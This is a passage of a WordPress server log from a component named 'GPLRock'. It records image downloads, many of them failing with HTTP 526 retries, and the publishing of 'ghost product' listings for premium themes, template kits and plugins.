kodelaw-lawyer-attorney-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-815f7422.webp [05-Apr-2026 10:31:48 UTC] GPLRock: Ghost product published with image - Product ID: kodelaw-lawyer-attorney-elementor-template-kit [05-Apr-2026 10:31:49 UTC] GPLRock: Image downloaded successfully for product kodai-asian-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29b5a65c.webp [05-Apr-2026 10:31:49 UTC] GPLRock: Using pre-downloaded image for product kodai-asian-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29b5a65c.webp [05-Apr-2026 10:31:49 UTC] GPLRock: Ghost product published with image - Product ID: kodai-asian-restaurant-elementor-template-kit [05-Apr-2026 10:33:43 UTC] GPLRock: Image downloaded successfully for product zingbox-wind-solar-energy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d0e161d9.jpg [05-Apr-2026 10:33:43 UTC] GPLRock: Using pre-downloaded image for product zingbox-wind-solar-energy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d0e161d9.jpg [05-Apr-2026 10:33:43 UTC] GPLRock: Ghost product published with image - Product ID: zingbox-wind-solar-energy-elementor-template-kit [05-Apr-2026 10:33:45 UTC] GPLRock: Image downloaded successfully for product zedello-consultant-finance-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d9f65f9.webp [05-Apr-2026 10:33:45 UTC] GPLRock: Using pre-downloaded image for product zedello-consultant-finance-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d9f65f9.webp [05-Apr-2026 10:33:45 UTC] GPLRock: Ghost product published with image - Product ID: zedello-consultant-finance-business-elementor-template-kit [05-Apr-2026 10:33:46 UTC] GPLRock: Image downloaded successfully for product yumma-food-recipe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42ce3aad.webp [05-Apr-2026 10:33:46 UTC] GPLRock: Using pre-downloaded image for product yumma-food-recipe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42ce3aad.webp [05-Apr-2026 10:33:46 UTC] GPLRock: Ghost product published with image - Product ID: yumma-food-recipe-elementor-template-kit [05-Apr-2026 10:33:47 UTC] GPLRock: Image downloaded successfully for product yoggs-yoga-meditation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec3975a5.webp [05-Apr-2026 10:33:48 UTC] GPLRock: Using pre-downloaded image for product yoggs-yoga-meditation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec3975a5.webp [05-Apr-2026 10:33:48 UTC] GPLRock: Ghost product published with image - Product ID: yoggs-yoga-meditation-elementor-template-kit [05-Apr-2026 10:43:49 UTC] GPLRock: Image downloaded successfully for product studiopress-outreach-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f42f4e71.jpg [05-Apr-2026 10:43:49 UTC] GPLRock: Using pre-downloaded image for product studiopress-outreach-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f42f4e71.jpg [05-Apr-2026 10:43:49 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-outreach-pro-genesis-wordpress-theme [05-Apr-2026 10:43:50 UTC] GPLRock: Image downloaded successfully for product give-paymill-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-18b77099.jpg [05-Apr-2026 10:43:51 UTC] GPLRock: Using pre-downloaded image for product give-paymill-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-18b77099.jpg [05-Apr-2026 10:43:51 UTC] GPLRock: Ghost product published with image - Product ID: give-paymill-gateway [05-Apr-2026 10:43:52 UTC] GPLRock: Image downloaded successfully for product minimum-professional-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97b6f375.jpg [05-Apr-2026 10:43:52 UTC] GPLRock: Using pre-downloaded image for product minimum-professional-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97b6f375.jpg [05-Apr-2026 10:43:52 UTC] GPLRock: Ghost product published with image - Product ID: minimum-professional-wordpress-theme [05-Apr-2026 10:43:54 UTC] GPLRock: Image downloaded successfully for product themeisle-wp-product-review (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7dc63253.jpg [05-Apr-2026 10:43:54 UTC] GPLRock: Using pre-downloaded image for product themeisle-wp-product-review: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7dc63253.jpg [05-Apr-2026 10:43:54 UTC] GPLRock: Ghost product published with image - Product ID: themeisle-wp-product-review [05-Apr-2026 10:43:56 UTC] GPLRock: Image downloaded successfully for product give-google-analytics-donation-tracking (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4eb91d5e.jpg [05-Apr-2026 10:43:56 UTC] GPLRock: Using pre-downloaded image for product give-google-analytics-donation-tracking: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4eb91d5e.jpg [05-Apr-2026 10:43:56 UTC] GPLRock: Ghost product published with image - Product ID: give-google-analytics-donation-tracking [05-Apr-2026 10:43:57 UTC] GPLRock: Image downloaded successfully for product gravity-forms-pipe-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db26d0e4.jpg [05-Apr-2026 10:43:57 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-pipe-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db26d0e4.jpg [05-Apr-2026 10:43:57 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-pipe-add-on [05-Apr-2026 10:43:59 UTC] GPLRock: Image downloaded successfully for product mega-main-menu-wordpress-menu-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40ade5d1.jpg [05-Apr-2026 10:43:59 UTC] GPLRock: Using pre-downloaded image for product mega-main-menu-wordpress-menu-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40ade5d1.jpg [05-Apr-2026 10:43:59 UTC] GPLRock: Ghost product published with image - Product ID: mega-main-menu-wordpress-menu-plugin [05-Apr-2026 10:44:00 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-convertkit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8cd326c6.jpg [05-Apr-2026 10:44:00 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-convertkit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8cd326c6.jpg [05-Apr-2026 10:44:00 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-convertkit [05-Apr-2026 10:44:02 UTC] GPLRock: Image downloaded successfully for product forgravity-entry-automation-dropbox-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd290a0a.jpg [05-Apr-2026 10:44:02 UTC] GPLRock: Using pre-downloaded image for product forgravity-entry-automation-dropbox-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd290a0a.jpg [05-Apr-2026 10:44:02 UTC] GPLRock: Ghost product published with image - Product ID: forgravity-entry-automation-dropbox-extension [05-Apr-2026 10:44:04 UTC] GPLRock: Image downloaded successfully for product studiopress-monochrome-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-614ecd64.jpg [05-Apr-2026 10:44:04 UTC] GPLRock: Using pre-downloaded image for product studiopress-monochrome-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-614ecd64.jpg [05-Apr-2026 10:44:04 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-monochrome-pro-genesis-wordpress-theme [05-Apr-2026 10:45:02 UTC] GPLRock: Image download failed for product podium-fashion-model-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:04 UTC] GPLRock: Image download failed for product podium-fashion-model-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/podium--fashion-model-agency-wordpress-theme-6852.webp for product podium-fashion-model-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:06 UTC] GPLRock: Image download failed for product podium-fashion-model-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:08 UTC] GPLRock: Image download failed for product podium-fashion-model-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/podium--fashion-model-agency-wordpress-theme-6852.webp for product podium-fashion-model-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:10 UTC] GPLRock WARNING: Image download failed for product podium-fashion-model-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/podium--fashion-model-agency-wordpress-theme-6852.webp [05-Apr-2026 10:45:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: podium-fashion-model-agency-wordpress-theme [05-Apr-2026 10:45:11 UTC] GPLRock: Image download failed for product eletra-marketplace-electronics-store (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:13 UTC] GPLRock: Image download failed for product eletra-marketplace-electronics-store (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eletra---marketplace-electronics-store-3940.webp for product eletra-marketplace-electronics-store after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:15 UTC] GPLRock: Image download failed for product eletra-marketplace-electronics-store (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:17 UTC] GPLRock: Image download failed for product eletra-marketplace-electronics-store (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eletra---marketplace-electronics-store-3940.webp for product eletra-marketplace-electronics-store after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:19 UTC] GPLRock WARNING: Image download failed for product eletra-marketplace-electronics-store. URL: https://meldwp.com/wp-content/uploads/eletra---marketplace-electronics-store-3940.webp [05-Apr-2026 10:45:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eletra-marketplace-electronics-store [05-Apr-2026 10:45:19 UTC] GPLRock: Image download failed for product renovate-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:21 UTC] GPLRock: Image download failed for product renovate-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renovate---construction-wordpress-theme-10121.webp for product renovate-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:24 UTC] GPLRock: Image download failed for product renovate-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:26 UTC] GPLRock: Image download failed for product renovate-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renovate---construction-wordpress-theme-10121.webp for product renovate-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:28 UTC] GPLRock WARNING: Image download failed for product renovate-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/renovate---construction-wordpress-theme-10121.webp [05-Apr-2026 10:45:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: renovate-construction-wordpress-theme [05-Apr-2026 10:45:28 UTC] GPLRock: Image download failed for product greenly-ecology-solar-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:30 UTC] GPLRock: Image download failed for product greenly-ecology-solar-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenly---ecology--solar-energy-wordpress-theme-7874.webp for product greenly-ecology-solar-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:32 UTC] GPLRock: Image download failed for product greenly-ecology-solar-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:34 UTC] GPLRock: Image download failed for product greenly-ecology-solar-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenly---ecology--solar-energy-wordpress-theme-7874.webp for product greenly-ecology-solar-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:36 UTC] GPLRock WARNING: Image download failed for product greenly-ecology-solar-energy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/greenly---ecology--solar-energy-wordpress-theme-7874.webp [05-Apr-2026 10:45:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: greenly-ecology-solar-energy-wordpress-theme [05-Apr-2026 10:45:38 UTC] GPLRock: Image download failed for product propaty-single-property-wordpress-theme-rtl-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:40 UTC] GPLRock: Image download failed for product propaty-single-property-wordpress-theme-rtl-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/propaty---single-property-wordpress-theme--rtl-ready-17402.webp for product propaty-single-property-wordpress-theme-rtl-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:42 UTC] GPLRock: Image download failed for product propaty-single-property-wordpress-theme-rtl-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:44 UTC] GPLRock: Image download failed for product propaty-single-property-wordpress-theme-rtl-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/propaty---single-property-wordpress-theme--rtl-ready-17402.webp for product propaty-single-property-wordpress-theme-rtl-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:46 UTC] GPLRock WARNING: Image download failed for product propaty-single-property-wordpress-theme-rtl-ready. URL: https://meldwp.com/wp-content/uploads/propaty---single-property-wordpress-theme--rtl-ready-17402.webp [05-Apr-2026 10:45:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: propaty-single-property-wordpress-theme-rtl-ready [05-Apr-2026 10:45:47 UTC] GPLRock: Image download failed for product ebullient-magazine-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:49 UTC] GPLRock: Image download failed for product ebullient-magazine-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ebullient---magazine--news-wordpress-theme-6198.webp for product ebullient-magazine-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:51 UTC] GPLRock: Image download failed for product ebullient-magazine-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:53 UTC] GPLRock: Image download failed for product ebullient-magazine-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ebullient---magazine--news-wordpress-theme-6198.webp for product ebullient-magazine-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:45:55 UTC] GPLRock WARNING: Image download failed for product ebullient-magazine-news-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ebullient---magazine--news-wordpress-theme-6198.webp [05-Apr-2026 10:45:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ebullient-magazine-news-wordpress-theme [05-Apr-2026 10:45:55 UTC] GPLRock: Image download failed for product nestbyte-creative-agency-and-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:45:57 UTC] GPLRock: Image download failed for product nestbyte-creative-agency-and-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nestbyte--creative-agency-and-startup-wordpress-theme-5650.webp for product nestbyte-creative-agency-and-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:00 UTC] GPLRock: Image download failed for product nestbyte-creative-agency-and-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:02 UTC] GPLRock: Image download failed for product nestbyte-creative-agency-and-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nestbyte--creative-agency-and-startup-wordpress-theme-5650.webp for product nestbyte-creative-agency-and-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:04 UTC] GPLRock WARNING: Image download failed for product nestbyte-creative-agency-and-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nestbyte--creative-agency-and-startup-wordpress-theme-5650.webp [05-Apr-2026 10:46:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nestbyte-creative-agency-and-startup-wordpress-theme [05-Apr-2026 10:46:04 UTC] GPLRock: Image download failed for product the-food-truck-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:06 UTC] GPLRock: Image download failed for product the-food-truck-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-food-truck---wordpress-theme-15158.webp for product the-food-truck-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:08 UTC] GPLRock: Image download failed for product the-food-truck-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:10 UTC] GPLRock: Image download failed for product the-food-truck-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-food-truck---wordpress-theme-15158.webp for product the-food-truck-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:12 UTC] GPLRock WARNING: Image download failed for product the-food-truck-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/the-food-truck---wordpress-theme-15158.webp [05-Apr-2026 10:46:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-food-truck-wordpress-theme [05-Apr-2026 10:46:13 UTC] GPLRock: Image download failed for product finxpert-finance-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:15 UTC] GPLRock: Image download failed for product finxpert-finance-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finxpert---finance--consulting-business-wordpress-theme-6502.webp for product finxpert-finance-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:17 UTC] GPLRock: Image download failed for product finxpert-finance-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:19 UTC] GPLRock: Image download failed for product finxpert-finance-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finxpert---finance--consulting-business-wordpress-theme-6502.webp for product finxpert-finance-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:21 UTC] GPLRock WARNING: Image download failed for product finxpert-finance-consulting-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finxpert---finance--consulting-business-wordpress-theme-6502.webp [05-Apr-2026 10:46:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finxpert-finance-consulting-business-wordpress-theme [05-Apr-2026 10:46:21 UTC] GPLRock: Image download failed for product mildhill-organic-and-food-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:23 UTC] GPLRock: Image download failed for product mildhill-organic-and-food-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mildhill---organic-and-food-store-wordpress-theme-17364.webp for product mildhill-organic-and-food-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:26 UTC] GPLRock: Image download failed for product mildhill-organic-and-food-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:28 UTC] GPLRock: Image download failed for product mildhill-organic-and-food-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:46:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mildhill---organic-and-food-store-wordpress-theme-17364.webp for product mildhill-organic-and-food-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:46:30 UTC] GPLRock WARNING: Image download failed for product mildhill-organic-and-food-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mildhill---organic-and-food-store-wordpress-theme-17364.webp [05-Apr-2026 10:46:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mildhill-organic-and-food-store-wordpress-theme [05-Apr-2026 10:48:47 UTC] GPLRock: Image downloaded successfully for product envira-gallery-videos-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-318dbfbf.jpg [05-Apr-2026 10:48:48 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-videos-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-318dbfbf.jpg [05-Apr-2026 10:48:48 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-videos-addon [05-Apr-2026 10:48:49 UTC] GPLRock: Image downloaded successfully for product elmastudio-onigiri-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7a0c2e06.jpg [05-Apr-2026 10:48:49 UTC] GPLRock: Using pre-downloaded image for product elmastudio-onigiri-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7a0c2e06.jpg [05-Apr-2026 10:48:49 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-onigiri-wordpress-theme [05-Apr-2026 10:48:51 UTC] GPLRock: Image downloaded successfully for product yith-panthea-minimal-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6df03399.jpg [05-Apr-2026 10:48:51 UTC] GPLRock: Using pre-downloaded image for product yith-panthea-minimal-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6df03399.jpg [05-Apr-2026 10:48:51 UTC] GPLRock: Ghost product published with image - Product ID: yith-panthea-minimal-woocommerce-theme [05-Apr-2026 10:48:53 UTC] GPLRock: Image downloaded successfully for product knowledge-base-helpdesk-support-wiki (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9d20df45.jpg [05-Apr-2026 10:48:53 UTC] GPLRock: Using pre-downloaded image for product knowledge-base-helpdesk-support-wiki: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9d20df45.jpg [05-Apr-2026 10:48:53 UTC] GPLRock: Ghost product published with image - Product ID: knowledge-base-helpdesk-support-wiki [05-Apr-2026 10:48:54 UTC] GPLRock: Image downloaded successfully for product wordpress-meta-data-taxonomies-filter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a7996a4.jpg [05-Apr-2026 10:48:54 UTC] GPLRock: Using pre-downloaded image for product wordpress-meta-data-taxonomies-filter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a7996a4.jpg [05-Apr-2026 10:48:54 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-meta-data-taxonomies-filter [05-Apr-2026 10:48:56 UTC] GPLRock: Image downloaded successfully for product ithemes-sales-accelerator-reporting-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecdf05ec.jpg [05-Apr-2026 10:48:56 UTC] GPLRock: Using pre-downloaded image for product ithemes-sales-accelerator-reporting-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecdf05ec.jpg [05-Apr-2026 10:48:56 UTC] GPLRock: Ghost product published with image - Product ID: ithemes-sales-accelerator-reporting-pro [05-Apr-2026 10:48:58 UTC] GPLRock: Image downloaded successfully for product media-grid-overlay-manager-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c789661.jpg [05-Apr-2026 10:48:58 UTC] GPLRock: Using pre-downloaded image for product media-grid-overlay-manager-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c789661.jpg [05-Apr-2026 10:48:58 UTC] GPLRock: Ghost product published with image - Product ID: media-grid-overlay-manager-add-on [05-Apr-2026 10:48:59 UTC] GPLRock: Image downloaded successfully for product ninja-forms-twilio-sms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-364b51f5.jpg [05-Apr-2026 10:48:59 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-twilio-sms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-364b51f5.jpg [05-Apr-2026 10:48:59 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-twilio-sms [05-Apr-2026 10:49:01 UTC] GPLRock: Image downloaded successfully for product mythemeshop-lawyer-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a833c0e.jpg [05-Apr-2026 10:49:01 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-lawyer-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a833c0e.jpg [05-Apr-2026 10:49:01 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-lawyer-wordpress-theme [05-Apr-2026 10:49:03 UTC] GPLRock: Image downloaded successfully for product buildpress-multi-purpose-construction-and-landscape-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4b99547.jpg [05-Apr-2026 10:49:03 UTC] GPLRock: Using pre-downloaded image for product buildpress-multi-purpose-construction-and-landscape-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4b99547.jpg [05-Apr-2026 10:49:03 UTC] GPLRock: Ghost product published with image - Product ID: buildpress-multi-purpose-construction-and-landscape-wp-theme [05-Apr-2026 10:50:28 UTC] GPLRock: Image downloaded successfully for product privatecontent-multilevel-content-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba1ff70e.jpg [05-Apr-2026 10:50:28 UTC] GPLRock: Using pre-downloaded image for product privatecontent-multilevel-content-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba1ff70e.jpg [05-Apr-2026 10:50:28 UTC] GPLRock: Ghost product published with image - Product ID: privatecontent-multilevel-content-plugin [05-Apr-2026 10:50:30 UTC] GPLRock: Image downloaded successfully for product wp-lister-pro-for-ebay-by-wp-lab (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4eac55b3.jpg [05-Apr-2026 10:50:30 UTC] GPLRock: 